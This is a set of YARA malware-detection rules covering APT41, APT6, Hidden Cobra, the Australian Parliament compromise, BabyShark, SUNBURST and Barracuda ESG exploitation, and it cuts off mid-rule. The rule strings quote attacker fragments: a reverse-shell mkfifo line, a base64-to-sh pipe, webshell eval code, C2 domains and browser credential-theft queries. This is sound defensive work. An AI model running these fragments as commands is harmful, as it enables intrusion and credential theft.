rule APT_APT41_HIGHNOON_BIN_2 {
meta:
description = "Detects APT41 malware HIGHNOON.BIN"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html"
date = "2019-08-07"
score = 85
hash1 = "63e8ed9692810d562adb80f27bb1aeaf48849e468bf5fd157bc83ca83139b6d7"
hash2 = "c51c5bbc6f59407286276ce07f0f7ea994e76216e0abe34cbf20f1b1cbd9446d"
id = "37d6a44d-7811-5e87-84e2-b2a8b3da3124"
strings:
$x1 = "\\Double\\Door_wh\\" ascii
$x2 = "[Stone] Config --> 2k3 TCP Positive Logout." fullword ascii
$x3 = "\\RbDoorX64.pdb" ascii
$x4 = "RbDoor, Version 1.0" fullword wide
$x5 = "About RbDoor" fullword wide
condition:
uint16(0) == 0x5a4d and filesize < 2000KB and 1 of them
}
rule APT_APT41_RevokedCert_Aug19_1 {
meta:
description = "Detects revoked certificates used by APT41 group"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html"
date = "2019-08-07"
score = 60
id = "f107cc42-58ec-500d-b1c3-27e9e00826aa"
condition:
uint16(0) == 0x5a4d and
for any i in (0 .. pe.number_of_signatures) : (
pe.signatures[i].serial == "0b:72:79:06:8b:eb:15:ff:e8:06:0d:2c:56:15:3c:35" or
pe.signatures[i].serial == "63:66:a9:ac:97:df:4d:e1:73:66:94:3c:9b:29:1a:aa" or
pe.signatures[i].serial == "01:00:00:00:00:01:30:73:85:f7:02" or
pe.signatures[i].serial == "14:0d:2c:51:5e:8e:e9:73:9b:b5:f1:b2:63:7d:c4:78" or
pe.signatures[i].serial == "7b:d5:58:18:c5:97:1b:63:dc:45:cf:57:cb:eb:95:0b" or
pe.signatures[i].serial == "53:0c:e1:4c:81:f3:62:10:a1:68:2a:ff:17:9e:25:80" or
pe.signatures[i].serial == "54:c6:c1:40:6f:b4:ac:b5:d2:06:74:e9:93:92:c6:3e" or
pe.signatures[i].serial == "fd:f2:83:7d:ac:12:b7:bb:30:ad:05:8f:99:9e:cf:00" or
pe.signatures[i].serial == "18:63:79:57:5a:31:46:e2:6b:ef:c9:0a:58:0d:1b:d2" or
pe.signatures[i].serial == "5c:2f:97:a3:1a:bc:32:b0:8c:ac:01:00:59:8f:32:f6" or
pe.signatures[i].serial == "4c:0b:2e:9d:2e:f9:09:d1:52:70:d4:dd:7f:a5:a4:a5" or
pe.signatures[i].serial == "58:01:5a:cd:50:1f:c9:c3:44:26:4e:ac:e2:ce:57:30" or
pe.signatures[i].serial == "47:6b:f2:4a:4b:1e:9f:4b:c2:a6:1b:15:21:15:e1:fe" or
pe.signatures[i].serial == "30:d3:c1:67:26:5b:52:0c:b8:7f:25:84:4f:95:cb:04" or
pe.signatures[i].serial == "1e:52:bb:f5:c9:0e:c1:64:d0:5b:e0:e4:16:61:52:5f" or
pe.signatures[i].serial == "25:f8:78:22:de:56:d3:98:21:59:28:73:ea:09:ca:37" or
pe.signatures[i].serial == "67:24:34:0d:db:c7:25:2f:7f:b7:14:b8:12:a5:c0:4d"
)
}
rule APT_APT41_CN_ELF_Speculoos_Backdoor {
meta:
description = "Detects Speculoos Backdoor used by APT41"
author = "Florian Roth (Nextron Systems)"
reference = "https://unit42.paloaltonetworks.com/apt41-using-new-speculoos-backdoor-to-target-organizations-globally/"
date = "2020-04-14"
score = 90
hash1 = "6943fbb194317d344ca9911b7abb11b684d3dca4c29adcbcff39291822902167"
hash2 = "99c5dbeb545af3ef1f0f9643449015988c4e02bf8a7164b5d6c86f67e6dc2d28"
id = "efe2b368-33af-5382-a5f0-0e7dd7f4dea4"
strings:
$xc1 = { 2F 70 72 69 76 61 74 65 2F 76 61 72 00 68 77 2E
70 68 79 73 6D 65 6D 00 68 77 2E 75 73 65 72 6D
65 6D 00 4E 41 2D 4E 41 2D 4E 41 2D 4E 41 2D 4E
41 2D 4E 41 00 6C 6F 30 00 00 00 00 25 30 32 78
2D 25 30 32 78 2D 25 30 32 78 2D 25 30 32 78 2D
25 30 32 78 2D 25 30 32 78 0A 00 72 00 4E 41 00
75 6E 61 6D 65 20 2D 76 }
$s1 = "badshell" ascii fullword
$s2 = "hw.physmem" ascii fullword
$s3 = "uname -v" ascii fullword
$s4 = "uname -s" ascii fullword
$s5 = "machdep.tsc_freq" ascii fullword
$s6 = "/usr/sbin/config.bak" ascii fullword
$s7 = "enter MessageLoop..." ascii fullword
$s8 = "exit StartCBProcess..." ascii fullword
$sc1 = { 72 6D 20 2D 72 66 20 22 25 73 22 00 2F 70 72 6F
63 2F }
condition:
uint16(0) == 0x457f and
filesize < 600KB and
1 of ($x*) or 4 of them
}

View file

@ -0,0 +1,55 @@
/*
Yara Rule Set
Author: Florian Roth
Date: 2016-04-09
Identifier: APT 6 Malware
*/
rule APT6_Malware_Sample_Gen : FILE {
meta:
description = "Rule written for 2 malware samples that communicated to APT6 C2 servers"
author = "Florian Roth (Nextron Systems)"
reference = "https://otx.alienvault.com/pulse/56c4d1664637f26ad04e5b73/"
date = "2016-04-09"
modified = "2023-01-06"
score = 80
hash1 = "321ec239bfa6927d39155ef5f10741ed786219489bbbb1dc8fee66e22f9f8e80"
hash2 = "7aef130b19d1f940e4c4cee6efe0f190f1402d2e0f741ee605c77518a04cb6d7"
id = "142d2714-f7bf-5725-bf7e-9497be7ed234"
strings:
/* Specific strings from samples */
$x2 = "SPCK!it is a [(?riddle?) wrapped in a {mystery}] inside an <enigma>!" fullword ascii
$x3 = "636C7369643A46334430443336462D323346382D343638322D413139352D373443393242303344344146" fullword ascii
/* Malware Strings */
$s1 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)" fullword ascii
$s2 = "DUMPTHIN" fullword ascii
$s3 = "\"C:\\WINDOWS\\system32\\" ascii
$s4 = "window.eval(f.decodeURIComponent(a));" fullword ascii
$s5 = "/tbedrs.dll" fullword ascii
$s6 = "NSISDL/1.2 (Mozilla)" fullword ascii
$s7 = "NSIS_Inetc (Mozilla)" fullword ascii
$s8 = "/logos.gif" fullword ascii
$s9 = "synflood" fullword ascii
$s10 = "IconFile=C:\\WINDOWS\\system32\\SHELL32.dll" fullword ascii
$s11 = "udpflood" fullword ascii
$s12 = "shellcode" fullword ascii
$s13 = "&PassWord=" fullword ascii
$s14 = "SystemPropertiesProtection.exe" fullword ascii
$s15 = "SystemPropertiesRemote.exe" fullword ascii
/* C2 Server user by APT 6 group */
$c1 = "jobcall.org" ascii
$c2 = "sportsinfinite.com" ascii
$c3 = "milsatcom.us" ascii
$c4 = "geographicphotographer.com" ascii
$c5 = "snowsmooth.com" ascii
$c6 = "goodre.net" ascii
$c7 = "gloflabs.com" ascii
condition:
(
uint16(0) == 0x5a4d and filesize < 1000KB and
( ( 1 of ($x*) and 3 of ($s*) ) or 1 of ($c*) )
) or
( 6 of them )
}

View file

@ -0,0 +1,76 @@
rule APT_HiddenCobra_enc_PK_header {
meta:
author = "NCCIC trusted 3rd party - Edit: Tobias Michalski"
incident = "10135536"
date = "2018-04-12"
category = "hidden_cobra"
family = "TYPEFRAME"
hash0 = "3229a6cea658b1b3ca5ca9ad7b40d8d4"
reference = "https://www.us-cert.gov/ncas/analysis-reports/AR18-165A"
description = "Hidden Cobra - Detects trojan with encrypted header"
id = "5d7001b3-162c-5a97-a740-1b8e33d4aa9e"
strings:
$s0 = { 5f a8 80 c5 a0 87 c7 f0 9e e6 }
$s1 = { 95 f1 6e 9c 3f c1 2c 88 a0 5a }
$s2 = { ae 1d af 74 c0 f5 e1 02 50 10 }
condition:
(uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and any of them
}
rule APT_HiddenCobra_import_obfuscation_2 {
meta:
author = "NCCIC trusted 3rd party - Edit: Tobias Michalski"
incident = "10135536"
date = "2018-04-12"
category = "hidden_cobra"
family = "TYPEFRAME"
hash0 = "bfb41bc0c3856aa0a81a5256b7b8da51"
reference = "https://www.us-cert.gov/ncas/analysis-reports/AR18-165A"
description = "Hidden Cobra - Detects remote access trojan"
id = "bc139580-a55b-514f-8a4e-ca1402ce3ad9"
strings:
$s0 = {A6 D6 02 EB 4E B2 41 EB C3 EF 1F}
$s1 = {B6 DF 01 FD 48 B5 }
$s2 = {B6 D5 0E F3 4E B5 }
$s3 = {B7 DF 0E EE }
$s4 = {B6 DF 03 FC }
$s5 = {A7 D3 03 FC }
condition:
(uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and all of them
}
rule APT_NK_AR18_165A_HiddenCobra_import_deob {
meta:
author = "NCCIC trusted 3rd party - Edit: Tobias Michalski"
incident = "10135536"
date = "2018-04-12"
category = "hidden_cobra"
family = "TYPEFRAME"
md5 = "ae769e62fef4a1709c12c9046301aa5d"
md5 = "e48fe20eblf5a5887f2ac631fed9ed63"
reference = "https://www.us-cert.gov/ncas/analysis-reports/AR18-165A"
description = "Hidden Cobra - Detects installed proxy module as a service"
id = "f403d589-be35-57a7-9675-f92657c11acc"
strings:
$ = { 8a 01 3c 62 7c 0a 3c 79 7f 06 b2 db 2a d0 88 11 8a 41 01 41 84 c0 75 e8}
$ = { 8A 08 80 F9 62 7C 0B 80 F9 79 7F 06 82 DB 2A D1 88 10 8A 48 01 40 84 C9 75 E6}
condition:
(uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and any of them
}
rule APT_NK_AR18_165A_1 {
meta:
description = "Detects APT malware from AR18-165A report by US CERT"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.us-cert.gov/ncas/analysis-reports/AR18-165A"
date = "2018-06-15"
hash1 = "089e49de61701004a5eff6de65476ed9c7632b6020c2c0f38bb5761bca897359"
id = "45f5205d-7f69-5646-aef8-f95d139f9720"
strings:
$s1 = "netsh.exe advfirewall firewall add rule name=\"PortOpenning\" dir=in protocol=tcp localport=%d action=allow enable=yes" fullword wide
$s2 = "netsh.exe firewall add portopening TCP %d \"PortOpenning\" enable" fullword wide
condition:
uint16(0) == 0x5a4d and filesize < 2000KB and 1 of them
}

View file

@ -0,0 +1,46 @@
rule APT_Area1_SSF_PlugX {
meta:
description = "Detects send tool used in phishing campaign reported by Area 1 in December 2018"
reference = "https://cdn.area1security.com/reports/Area-1-Security-PhishingDiplomacy.pdf"
date = "2018-12-19"
author = "Area 1"
id = "a5b4e781-f0d1-55df-926c-2d321aa48139"
strings:
$feature_call = { 8b 0? 56 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ??
6a 07 6a ff ff d0 8b f0 85 f6 74 14 }
$keylogger_reg = { 8b 4d 08 6a 0c 6a 01 8d 55 f4 52 c7 45 f4 01 00 06 00
c7 45 f8 00 01 00 00 89 4d fc ff d0 85 c0 75 1d }
$file_op = { 55 8b ec 83 ec 20 0f b7 56 18 8b 46 10 66 8b 4e 14 89 45 e4
8d 44 32 10 66 89 4d f0 0f b7 4e 1a 57 89 45 e8 33 ff 8d 45 e0 8d 54
31 10 50 89 7d e0 89 55 ec c7 45 fa ?? ?? ?? ?? 89 7d f2 89 7d f6 ff
15 1c 43 02 10 }
$ver_cmp = { 0f b6 8d b0 fe ff ff 0f b6 95 b4 fe ff ff 66 c1 e1 08 0f b7
c1 0b c2 3d 02 05 00 00 7f 2c }
$regedit = { c7 06 23 01 12 20 c7 46 04 01 90 00 00 89 5e 0c 89 5e 08 e8
51 fb ff ff 8b 4d 08 8b 50 38 68 30 75 00 00 56 51 ff d2 }
$get_device_caps = { 8b 1d ?? ?? ?? ?? 6a 08 50 ff d3 0f b7 56 12 8b c8 0f af ca
b8 1f 85 eb 51 f7 e9 c1 fa 05 8b c2 c1 e8 1f 03 c2 89 45 f8 8b 45 f0 6a 0a 50 ff d3
0f b7 56 14 8b c8 0f af ca b8 1f 85 eb 51 }
condition:
3 of them
}
rule APT_Area1_SSF_GoogleSend_Strings {
meta:
description = "Detects send tool used in phishing campaign reported by Area 1 in December 2018"
reference = "https://cdn.area1security.com/reports/Area-1-Security-PhishingDiplomacy.pdf"
date = "2018-12-19"
author = "Area 1 (modified by Florian Roth)"
id = "66a2faa1-b133-528c-91a9-06a43d2c00a0"
strings:
$conf = "RefreshToken.ini" wide
$client_id = "Enter your client ID here" wide
$client_secret = "Enter your client secret here" wide
$status = "We are going to send" wide
$s1 = { b8 00 01 00 00 f0 0f b0 23 74 94 f3 90 80 3d ?? ?? ?? ?? 00 75 ??
51 52 6a 00 e8 ?? ?? ?? ?? 5a 59 b8 00 01 00 00 f0 0f b0
23 0f ?? ?? ?? ?? ?? 51 52 6a 0a e8 ?? ?? ?? ?? 5a 59 eb c3 }
condition:
uint16(0) == 0x5a4d and 3 of them
}

View file

@ -0,0 +1,172 @@
/*
YARA Rule Set
Author: Florian Roth
Date: 2019-02-18
Identifier: Compromise of the Australian Parliament House network
Reference: https://cyber.gov.au/government/news/parliament-house-network-compromise/
https://twitter.com/cyb3rops/status/1097423665472376832
*/
/* Rule Set ----------------------------------------------------------------- */
rule APT_WebShell_Tiny_1 {
meta:
description = "Detetcs a tiny webshell involved in the Australian Parliament House network compromise"
author = "Florian Roth (Nextron Systems)"
reference = "https://twitter.com/cyb3rops/status/1097423665472376832"
date = "2019-02-18"
id = "e65a8920-0684-5aae-a2b8-079c2beae08a"
strings:
$x1 = "eval(" ascii wide
condition:
( uint16(0) == 0x3f3c or uint16(0) == 0x253c ) and filesize < 40 and $x1
}
rule APT_WebShell_AUS_Tiny_2 {
meta:
description = "Detetcs a tiny webshell involved in the Australian Parliament House network compromise"
author = "Florian Roth (Nextron Systems)"
reference = "https://twitter.com/cyb3rops/status/1097423665472376832"
date = "2019-02-18"
hash1 = "0d6209d86f77a0a69451b0f27b476580c14e0cda15fa6a5003aab57a93e7e5a5"
id = "4746d4ce-628a-59b0-9032-7e0759d96ad3"
strings:
$x1 = "Request.Item[System.Text.Encoding.UTF8.GetString(Convert.FromBase64String(\"[password]\"))];" ascii
$x2 = "eval(arguments,System.Text.Encoding.UTF8.GetString(Convert.FromBase64String(\"" ascii
condition:
( uint16(0) == 0x3f3c or uint16(0) == 0x253c ) and filesize < 1KB and 1 of them
}
rule APT_WebShell_AUS_JScript_3 {
meta:
description = "Detetcs a webshell involved in the Australian Parliament House network compromise"
author = "Florian Roth (Nextron Systems)"
reference = "https://twitter.com/cyb3rops/status/1097423665472376832"
date = "2019-02-18"
hash1 = "7ac6f973f7fccf8c3d58d766dec4ab7eb6867a487aa71bc11d5f05da9322582d"
id = "ff7e780b-ccf9-53b6-b741-f04a8cbaf580"
strings:
$s1 = "<%@ Page Language=\"Jscript\" validateRequest=\"false\"%><%try{eval(System.Text.Encoding.UTF8.GetString(Convert.FromBase64String" ascii
$s2 = ".Item[\"[password]\"])),\"unsafe\");}" ascii
condition:
uint16(0) == 0x6568 and filesize < 1KB and all of them
}
rule APT_WebShell_AUS_4 {
meta:
description = "Detetcs a webshell involved in the Australian Parliament House network compromise"
author = "Florian Roth (Nextron Systems)"
reference = "https://twitter.com/cyb3rops/status/1097423665472376832"
date = "2019-02-18"
hash1 = "83321c02339bb51735fbcd9a80c056bd3b89655f3dc41e5fef07ca46af09bb71"
id = "bb5b10d1-3528-5361-92fc-8440c65dcda4"
strings:
$s1 = "wProxy.Credentials = new System.Net.NetworkCredential(pusr, ppwd);" fullword ascii
$s2 = "{return System.Text.Encoding.UTF8.GetString(Convert.FromBase64String(" ascii
$s3 = ".Equals('User-Agent', StringComparison.OrdinalIgnoreCase))" ascii
$s4 = "gen.Emit(System.Reflection.Emit.OpCodes.Ret);" fullword ascii
condition:
uint16(0) == 0x7566 and filesize < 10KB and 3 of them
}
rule APT_Script_AUS_4 {
meta:
description = "Detetcs a script involved in the Australian Parliament House network compromise"
author = "Florian Roth (Nextron Systems)"
reference = "https://twitter.com/cyb3rops/status/1097423665472376832"
date = "2019-02-18"
hash1 = "fdf15f388a511a63fbad223e6edb259abdd4009ec81fcc87ce84f0f2024c8057"
id = "5cbf2476-5ce8-540d-b87b-e400daf49b43"
strings:
$x1 = "myMutex = CreateMutex(0, 1, \"teX23stNew\")" fullword ascii
$x2 = "mmpath = Environ(appdataPath) & \"\\\" & \"Microsoft\" & \"\\\" & \"mm.accdb\"" fullword ascii
$x3 = "Dim mmpath As String, newmmpath As String, appdataPath As String" fullword ascii
$x4 = "'MsgBox \"myMutex Created\" Do noting" fullword ascii
$x5 = "appdataPath = \"app\" & \"DatA\"" fullword ascii
$x6 = ".DoCmd.Close , , acSaveYes" fullword ascii
condition:
filesize < 7KB and 1 of them
}
rule APT_WebShell_AUS_5 {
meta:
description = "Detetcs a webshell involved in the Australian Parliament House network compromise"
author = "Florian Roth (Nextron Systems)"
reference = "https://twitter.com/cyb3rops/status/1097423665472376832"
date = "2019-02-18"
hash1 = "54a17fb257db2d09d61af510753fd5aa00537638a81d0a8762a5645b4ef977e4"
id = "59b3f6aa-2d3b-54b4-b543-57bd9d981e87"
strings:
$a1 = "function DEC(d){return System.Text.Encoding.UTF8.GetString(Convert.FromBase64String(d));}" fullword ascii
$a2 = "function ENC(d){return Convert.ToBase64String(System.Text.Encoding.UTF8.GetBytes(d));}" fullword ascii
$s1 = "var hash=DEC(Request.Item['" ascii
$s2 = "Response.Write(ENC(SET_ASS_SUCCESS));" fullword ascii
$s3 = "hashtable[hash] = assCode;" fullword ascii
$s4 = "Response.Write(ss);" fullword ascii
$s5 = "var hashtable = Application[CachePtr];" fullword ascii
condition:
uint16(0) == 0x7566 and filesize < 2KB and 4 of them
}
rule HKTL_LazyCat_LogEraser {
meta:
description = "Detetcs a tool used in the Australian Parliament House network compromise"
author = "Florian Roth (Nextron Systems)"
reference = "https://twitter.com/cyb3rops/status/1097423665472376832"
date = "2019-02-18"
hash1 = "1c113dce265e4d744245a7c55dadc80199ae972a9e0ecbd0c5ced57067cf755b"
hash2 = "510375f8142b3651df67d42c3eff8d2d880987c0e057fc75a5583f36de34bf0e"
id = "a3d74657-a389-5482-ab26-966e790afd50"
strings:
$x1 = "LazyCat.dll" ascii wide fullword
$x2 = ".local_privilege_escalation.rotten_potato" ascii wide
$x3 = "LazyCat.Extension" ascii wide
$x4 = " MEOWof" ascii wide
$x5 = "VirtualSite: {0}, Address: {1:X16}, Name: {2}, Handle: {3:X16}, LogPath: {4}" fullword wide
$s1 = "LazyCat" fullword ascii wide
$s2 = "$e3ff37f2-85d7-4b24-a385-7eeb1f5a9562"
$s3 = "local -> remote {0} bytes"
$s4 = "remote -> local {0} bytes"
condition:
3 of them
}
rule HKTL_PowerKatz_Feb19_1 {
meta:
description = "Detetcs a tool used in the Australian Parliament House network compromise"
author = "Florian Roth (Nextron Systems)"
reference = "https://twitter.com/cyb3rops/status/1097423665472376832"
date = "2019-02-18"
id = "294d6f6c-dbc8-5431-87a0-64abe582c4ea"
strings:
$x1 = "Powerkatz32" ascii wide fullword
$x2 = "Powerkatz64" ascii wide
$s1 = "GetData: not found taskName" fullword ascii wide
$s2 = "GetRes Ex:" fullword ascii wide
condition:
1 of ($x*) and 1 of ($s*)
}
rule HKTL_Unknown_Feb19_1 {
meta:
description = "Detetcs a tool used in the Australian Parliament House network compromise"
author = "Florian Roth (Nextron Systems)"
reference = "https://twitter.com/cyb3rops/status/1097423665472376832"
date = "2019-02-18"
id = "bdcadc4b-8881-5dc7-b203-4e79cbc850ed"
strings:
$x1 = "not a valid timeout format!" ascii wide fullword
$x2 = "host can not be empty!" ascii wide fullword
$x3 = "not a valid port format!" ascii wide fullword
$x4 = "{0} - {1} TTL={2} time={3}" ascii wide fullword
$x5 = "ping count is not a correct format!" ascii wide fullword
$s1 = "The result is too large,program store to '{0}'.Please download it manully." fullword ascii wide
$s2 = "C:\\Windows\\temp\\" ascii wide
condition:
1 of ($x*) or 2 of them
}

View file

@ -0,0 +1,53 @@
import "pe"
rule MAL_PE_Type_BabyShark_Loader {
meta:
description = "Detects PE Type babyShark loader mentioned in February 2019 blog post by PaloAltNetworks"
author = "Florian Roth (Nextron Systems)"
reference = "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/"
date = "2019-02-24"
hash1 = "6f76a8e16908ba2d576cf0e8cdb70114dcb70e0f7223be10aab3a728dc65c41c"
id = "141e7a67-7930-5fd8-ac91-5d31b99e4ff3"
strings:
$x1 = "reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\" /v AutoRun /t REG_SZ /d \"%s\" /f" fullword ascii
$x2 = /mshta\.exe http:\/\/[a-z0-9\.\/]{5,30}\.hta/
$xc1 = { 57 69 6E 45 78 65 63 00 6B 65 72 6E 65 6C 33 32
2E 44 4C 4C 00 00 00 00 } /* WinExec kernel32.DLL */
condition:
uint16(0) == 0x5a4d and (
pe.imphash() == "57b6d88707d9cd1c87169076c24f962e" or
1 of them or
for any i in (0 .. pe.number_of_signatures) : (
pe.signatures[i].issuer contains "thawte SHA256 Code Signing CA" and
pe.signatures[i].serial == "0f:ff:e4:32:a5:3f:f0:3b:92:23:f8:8b:e1:b8:3d:9d"
)
)
}
rule APT_NK_BabyShark_KimJoingRAT_Apr19_1 {
meta:
description = "Detects BabyShark KimJongRAT"
author = "Florian Roth (Nextron Systems)"
reference = "https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/"
date = "2019-04-27"
hash1 = "d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712"
id = "c6bd1e1a-68f2-5a2d-a159-b16ea0d33987"
strings:
$x1 = "%s\\Microsoft\\ttmp.log" fullword wide
$a1 = "logins.json" fullword ascii
$s1 = "https://www.google.com/accounts/servicelogin" fullword ascii
$s2 = "https://login.yahoo.com/config/login" fullword ascii
$s3 = "SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login" ascii
$s4 = "\\mozsqlite3.dll" ascii
$s5 = "SMTP Password" fullword ascii
$s6 = "Yandex\\YandexBrowser\\User Data\\Default\\Login Data" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 2000KB and (
1 of ($x*) or
( $a1 and 3 of ($s*) )
)
}

View file

@ -0,0 +1,17 @@
rule custom_ssh_backdoor_server {
meta:
description = "Custome SSH backdoor based on python and paramiko - file server.py"
author = "Florian Roth (Nextron Systems)"
reference = "https://goo.gl/S46L3o"
date = "2015-05-14"
modified = "2022-08-18"
hash = "0953b6c2181249b94282ca5736471f85d80d41c9"
id = "eccf705b-b2c3-5af6-ab86-70292089812b"
strings:
$s0 = "command= raw_input(\"Enter command: \").strip('n')" fullword ascii
$s1 = "print '[-] (Failed to load moduli -- gex will be unsupported.)'" fullword ascii
$s2 = "print '[-] Listen/bind/accept failed: ' + str(e)" fullword ascii
condition:
2 of them
}

View file

@ -0,0 +1,47 @@
rule APT_fnv1a_plus_extra_XOR_in_MSIL_experimental
{
meta:
description = "This rule detects the specific MSIL implementation of fnv1a of the SUNBURST backdoor (standard fnv1a + one final XOR before RET) independent of the XOR-string. (fnv64a_offset and fnv64a_prime are standard constants in the fnv1a hashing algorithm.)"
reference = "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html"
author = "Arnim Rupp"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
date = "2020-12-22"
hash1 = "32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77"
hash2 = "ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6"
hash3 = "019085a76ba7126fff22770d71bd901c325fc68ac55aa743327984e89f4b0134"
id = "5505f7ff-eca5-5274-bdd1-dbbd648c3ccc"
strings:
$fnv64a_offset = { 25 23 22 84 e4 9c f2 cb }
$fnv64a_prime_plus_gap_plus_xor_ret = { B3 01 00 00 00 01 [8-40] 61 2A 00 00 }
// use for less false positives, xor before fnv1a prime
//$fnv64a_prime_plus_gap_plus_xor_ret = { 61 [0-3] B3 01 00 00 00 01 [8-40] 61 2A }
// even less false positives, not sure if it misses beef
//$fnv64a_prime_plus_gap_plus_xor_ret = { 61 [0-3] B3 01 00 00 00 01 [8-40] 61 2A 00 00 }
condition:
(uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them
}
// todo:
// Rules wouldn't work yet for bitshift instead of multiplication as described in http://www.isthe.com/chongo/tech/comp/fnv/index.html : hval += (hval << 1) + (hval << 4) + (hval << 5) + (hval << 7) + (hval << 8) + (hval << 40);
// Deactivated. This rule is probably only useful for developers to check their own software repository
/*
rule TEST_false_positive_plain_fnv1a_in_x64
{
meta:
description = "This rule detects x64 implementations of standard fnv1a just by looking for the standard fnv64a_offset and fnv64a_prime (unless bitshifting is used instead of multiplication). This rule would have found the SUNBURST backdoor at Solarwinds but will also find any other programm which implements fnv1a. Just useful for developers, pls check if that fnv1a was put there by you ;)"
reference = "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html"
author = "Arnim Rupp"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
date = "2020-12-22"
score = 10
strings:
$fnv64a_offset = { 25 23 22 84 e4 9c f2 cb }
$fnv64a_prime = { B3 01 00 00 00 01 }
condition:
// MZ or ELF
( uint16(0) == 0x5a4d or uint32be(0) == 0x7f454c46 ) and all of them
}
*/

View file

@ -0,0 +1,19 @@
/*
Author: Bit Byte Bitten
Date: 5/14/2015
*/
rule apt_backspace{
meta:
description = "Detects APT backspace"
author = "Bit Byte Bitten"
date = "2015-05-14"
hash = "6cbfeb7526de65eb2e3c848acac05da1e885636d17c1c45c62ad37e44cd84f99"
id = "3da3337d-b6d3-5661-b43e-535e06817303"
strings:
$s1 = "!! Use Splice Socket !!"
$s2 = "User-Agent: SJZJ (compatible; MSIE 6.0; Win32)"
$s3 = "g_nAV=%d,hWnd:0x%X,className:%s,Title:%s,(%d,%d,%d,%d),BOOL=%d"
condition:
uint16(0) == 0x5a4d and all of them
}

View file

@ -0,0 +1,228 @@
rule APT_UNC4841_ESG_Barracuda_CVE_2023_2868_Forensic_Artifacts_Jun23_1 : SCRIPT {
meta:
description = "Detects forensic artifacts found in the exploitation of CVE-2023-2868 in Barracuda ESG devices by UNC4841"
author = "Florian Roth"
reference = "https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally"
date = "2023-06-15"
modified = "2023-06-16"
score = 75
id = "50518fa1-33de-5fe5-b957-904d976fb29a"
strings:
$x01 = "=;ee=ba;G=s;_ech_o $abcdefg_${ee}se64" ascii
$x02 = ";echo $abcdefg | base64 -d | sh" ascii
$x03 = "setsid sh -c \"mkfifo /tmp/p" ascii
$x04 = "sh -i </tmp/p 2>&1" ascii
$x05 = "if string.match(hdr:body(), \"^[%w%+/=" ascii
$x06 = "setsid sh -c \"/sbin/BarracudaMailService eth0\""
$x07 = "echo \"set the bvp ok\""
$x08 = "find ${path} -type f ! -name $excludeFileNameKeyword | while read line ;"
$x09 = " /mail/mstore | xargs -i cp {} /usr/share/.uc/"
$x10 = "tar -T /mail/mstore/tmplist -czvf "
$sa1 = "sh -c wget --no-check-certificate http"
$sa2 = ".tar;chmod +x "
condition:
1 of ($x*)
or all of ($sa*)
}
rule APT_MAL_UNC4841_SEASPY_Jun23_1 {
meta:
description = "Detects SEASPY malware used by UNC4841 in attacks against Barracuda ESG appliances exploiting CVE-2023-2868"
author = "Florian Roth"
reference = "https://blog.talosintelligence.com/alchimist-offensive-framework/"
date = "2023-06-16"
score = 85
hash1 = "3f26a13f023ad0dcd7f2aa4e7771bba74910ee227b4b36ff72edc5f07336f115"
id = "bcff58f8-87f6-5371-8b96-5d4c0f349000"
strings:
$sx1 = "usage: ./BarracudaMailService <Network-Interface>. e.g.: ./BarracudaMailService eth0" ascii fullword
$s1 = "fcntl.tmp.amd64." ascii
$s2 = "Child process id:%d" ascii fullword
$s3 = "[*]Success!" ascii fullword
$s4 = "NO port code" ascii
$s5 = "enter open tty shell" ascii
$op1 = { 48 89 c6 f3 a6 0f 84 f7 01 00 00 bf 6c 84 5f 00 b9 05 00 00 00 48 89 c6 f3 a6 0f 84 6a 01 00 00 }
$op2 = { f3 a6 0f 84 d2 00 00 00 48 89 de bf 51 5e 61 00 b9 05 00 00 00 f3 a6 74 21 48 89 de }
$op3 = { 72 de 45 89 f4 e9 b8 f4 ff ff 48 8b 73 08 45 85 e4 ba 49 3d 62 00 b8 44 81 62 00 48 0f 45 d0 }
condition:
uint16(0) == 0x457f
and filesize < 9000KB
and 3 of them
or 5 of them
}
rule APT_MAL_UNC4841_SEASPY_LUA_Jun23_1 {
meta:
description = "Detects SEASPY malware related LUA script"
author = "Florian Roth"
reference = "https://blog.talosintelligence.com/alchimist-offensive-framework/"
date = "2023-06-16"
score = 90
hash1 = "56e8066bf83ff6fe0cec92aede90f6722260e0a3f169fc163ed88589bffd7451"
id = "a44861d0-107e-589b-8cf1-3fbc2f5c78dc"
strings:
$x1 = "os.execute('rverify'..' /tmp/'..attachment:filename())" ascii fullword
$x2 = "log.debug(\"--- opening archive [%s], mimetype [%s]\", tmpfile" ascii fullword
$xe1 = "os.execute('rverify'..' /tmp/'..attachment:filename())" ascii base64
$xe2 = "log.debug(\"--- opening archive [%s], mimetype [%s]\", tmpfile" ascii base64
condition:
filesize < 500KB and 1 of them
}
rule APT_HKTL_Proxy_Tool_Jun23_1 {
meta:
